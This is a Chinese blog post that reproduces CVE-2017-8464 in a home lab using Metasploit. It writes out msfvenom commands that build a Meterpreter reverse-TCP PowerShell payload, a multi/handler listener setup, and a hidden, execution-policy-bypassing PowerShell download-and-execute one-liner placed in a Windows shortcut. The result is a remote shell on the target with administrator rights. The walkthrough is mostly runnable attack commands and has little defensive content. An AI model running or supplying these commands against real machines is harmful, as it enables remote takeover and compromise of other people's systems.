您的位置:首页 > 编程语言 > ASP

CVE-2017-8464 远程命令执行漏洞复现

2018-01-22 19:54 1511 查看
漏洞编号:CVE2017-8464

服务器版本:Windows 7 专业版

攻击工具:metasploit

靶机IP:192.168.1.198

攻击机IP:192.168.1.187(kali)

漏洞复现原理:创建包含恶意执行脚本的快捷方式并且运行,致使本机中毒。

运行kali,在终端中生成一个反弹shell,执行:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.187   LPORT=5555 -f psh-reflection>/opt/search.ps1


如果目标机是64位主机执行:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.187   LPORT=5555 -f psh-reflection>/opt/search.ps1




进入到【/opt】目录下,查看文件“search.ps1”是否创建成功



将创建的“search.ps1”文件copy到【/var/www/html】目录下



启动Apache服务器



网页访问http://192.168.1.187/search.ps1,查看是否成功



在kali下面启动MSF软件输入命令



输入命令进入【handler】use exploit/multi/handler

指定本机IP 【LHOST】

指定端口【LPORT】

设置返回载荷 set payload windows/x64/meterpreter/reverse_tcp

运行



在目标机中创建快捷键,在对象的位置中输入:

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.187/search.ps1');test.ps1"


然后点击下一步,快捷名称命名为:powershell.exe(默认的powershell.exe)



运行快捷方式,回到kali攻击机中,如果msf从监听模式变成如下形式,表示已经获取目标机shell



执行ls命令,可以发现所列出的文件在目标机的C盘下



执行shell命令,进入靶机,就可以执行cmd命令了(此处已经是管理员权限,故而不在进行提权)

内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签:  Metasploit